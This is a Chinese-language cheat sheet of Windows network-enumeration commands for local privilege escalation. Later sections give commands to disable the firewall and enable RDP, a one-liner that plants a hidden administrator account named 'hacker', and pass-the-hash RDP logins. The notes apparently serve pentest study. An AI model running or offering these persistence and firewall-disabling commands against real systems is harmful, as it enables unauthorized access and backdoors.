windows本地提权之网络枚举 - 《windows本地提权》

网络共享
hosts文件
网卡和DNS
开启的端口
路由表
ARP缓存
防火墙

网络共享

net view 获取主机列表
net view /all /domain [domainname] 获取域内共享
net view \computer /ALL 列出主机共享
net use x: \computer\share 将共享挂载到本地
net share 查看当前共享

hosts文件

查看是否有其他已知的主机存在
type C:\Windows\System32\drivers\etc\hosts

网卡和DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

开启的端口

netstat -ano

路由表

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP缓存

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

防火墙

netsh firewall show state 防火墙开启状态
netsh advfirewall firewall show rule name=all
netsh firewall show config 防火墙配置
netsh advfirewall show allprofiles

netsh advfirewall set allprofiles state off 关闭防火墙
netSh advfirewall set allprofiles state on 开启防火墙
netsh firewall set opmode disable 老版本winserver关闭防火墙

开启端口
netsh advfirewall firewall add rule name=”NetBIOS UDP Port 138” dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name=”NetBIOS TCP Port 139” dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 “Remote Desktop”

开启RDP
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 “Remote Desktop”

开启远程协助
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

经典combo
添加用户，添加到管理员组和RDP组，开启RDP，开启防火墙
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup “Remote Desktop Users” hacker /add & reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 “Remote Desktop” & netsh firewall set service remoteadmin enable

连接RDP
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49